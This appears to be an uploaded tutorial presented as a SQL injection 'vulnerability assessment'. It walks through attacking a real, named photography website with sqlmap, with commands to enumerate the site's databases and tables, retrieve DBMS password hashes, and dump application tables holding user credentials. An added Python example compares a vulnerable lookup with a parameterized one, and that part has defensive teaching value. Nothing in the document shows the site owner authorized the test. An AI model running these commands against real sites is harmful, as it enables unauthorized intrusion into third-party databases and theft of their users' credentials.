SQL Injection
Uploaded by naveen Bellana

SQL INJECTION VULNERABILITY ASSESSMENT
BY RAJA SHEKAR REDDY

STEP 1:
Find a website to test (here found through a Google search). Only run the steps below against a site you are authorized to test; the procedure is the same for a lab target.

- https://www.hullihenmoorephotography.com is the target website used in this assessment.

STEP 2:
Confirm that the id parameter drives a database lookup. Change the value of id and check whether the page content changes with it:

book_details.php?id=601

book_details.php?id=602, with id changed to 602 a different record is returned, so the parameter is passed to a backend query and is worth testing for injection.


STEP 3:
Append a single quote ' to the id value (book_details.php?id=601') to check whether the input is placed unescaped into the SQL statement.

- If it is vulnerable, the stray quote breaks the query syntax and the server returns a database error or a visibly different page, as in the screenshot referenced here (not reproduced in this text).
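The mechanics behind STEP 2 and STEP 3, as an added example that is not part of the original write-up: a constructed SQLite-backed lookup that splices the id parameter into the query the way a vulnerable book_details.php would, beside the hardened form, plus the two probes an assessor runs by hand. The table, column names and rows are invented stand-ins (the real schema is not known from the page). It goes one step beyond the page's quote test by also showing the boolean-based AND 1=1 / AND 1=2 comparison that sqlmap's detection phase relies on, which still works when a site suppresses error messages.

```python
import sqlite3

# Constructed stand-in for the site's backend: table and column names are
# invented, the real schema behind book_details.php is not known from the page.
BOOKS = [
    (601, "Wedding album"),
    (602, "Portrait session"),
    (603, "Engagement shoot"),
]


def build_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE book (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO book VALUES (?, ?)", BOOKS)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Models a handler that splices the id parameter straight into the SQL text.
    Returns the matching rows, or the database error string the page would leak."""
    sql = f"SELECT id, title FROM book WHERE id = {raw_id}"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def safe_lookup(conn, raw_id):
    """Hardened handler: reject anything that is not an integer, then bind the
    value as a query parameter so it can never be parsed as SQL."""
    try:
        book_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, title FROM book WHERE id = ?", (book_id,)
    ).fetchall()


def quote_probe(lookup, conn, base_id):
    """STEP 3 of the write-up: append a single quote and see whether the backend
    chokes on it (an error where a normal page was expected)."""
    return isinstance(lookup(conn, f"{base_id}'"), str)


def boolean_probe(lookup, conn, base_id):
    """Boolean-based check of the kind sqlmap runs in its detection phase: a
    condition that is always true must leave the response unchanged, while one
    that is always false must change it. Unlike the quote test, this also works
    when the site hides database errors."""
    baseline = lookup(conn, base_id)
    if isinstance(baseline, str):
        return False
    always_true = lookup(conn, f"{base_id} AND 1=1")
    always_false = lookup(conn, f"{base_id} AND 1=2")
    return baseline == always_true and baseline != always_false


if __name__ == "__main__":
    db = build_db()
    for name, handler in (("vulnerable", vulnerable_lookup), ("safe", safe_lookup)):
        print(name, "id=601 ->", handler(db, "601"))
        print(name, "id=602 ->", handler(db, "602"))
        print(name, "id=601' ->", handler(db, "601'"))
        print(name, "quote probe:", quote_probe(handler, db, "601"),
              "boolean probe:", boolean_probe(handler, db, "601"))
```

Run it directly to see both handlers side by side: the concatenating handler returns a different row for 602, an error for 601', and every row for 601 OR 1=1, while the bound-parameter handler returns rows only for a well-formed integer and fails both probes.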

STEP 4:
Run sqlmap from the terminal. The URL is quoted so the shell does not interpret the ? and = in the query string; -u (long form --url) gives the target and --dbs asks sqlmap to enumerate databases:

sqlmap -u "https://hullihenmoorephotography.com/book_details.php?id=601" --dbs

STEP 5:
Wait for the scan to finish. Along the way sqlmap asks Yes/No questions (for example whether to skip payloads specific to other DBMSes once the backend is identified); answer Y, or add --batch to the command to accept the defaults without prompting.

When injection is confirmed, the command lists the databases the injected query can see.

- The available databases are:

# hmphoto

# information_schema

information_schema is the server's built-in metadata schema, not application data, so the application's own tables live in hmphoto.

STEP 6:
Run the command

sqlmap -h

which lists the commonly used sqlmap options (sqlmap -hh prints the full list).

STEP 7:
Now fetch all the tables in the application database. Select it with -D and ask for the table listing with --tables (the --dbs switch from STEP 4 is no longer needed):

sqlmap -u "https://hullihenmoorephotography.com/book_details.php?id=601" -D hmphoto --tables

STEP 8:
The above command fetches all the tables in the hmphoto database.

STEP 9:
Now look for passwords in the database. Run the command

sqlmap -u "https://hullihenmoorephotography.com/book_details.php?id=601" --passwords

Note what --passwords actually returns: it enumerates the DBMS user accounts and their password hashes from the server's own privilege tables, and it only succeeds if the account the web application connects with is allowed to read them. It does not read the passwords of the application's users stored in hmphoto; for those, the relevant table from STEP 8 has to be dumped with -D hmphoto -T <table> --dump (the table name is not given in this write-up). Hashes recovered either way still need to be cracked offline before they can be used.

Proof of confirmation:

The file shown in the screenshot referenced here (not reproduced in this text).

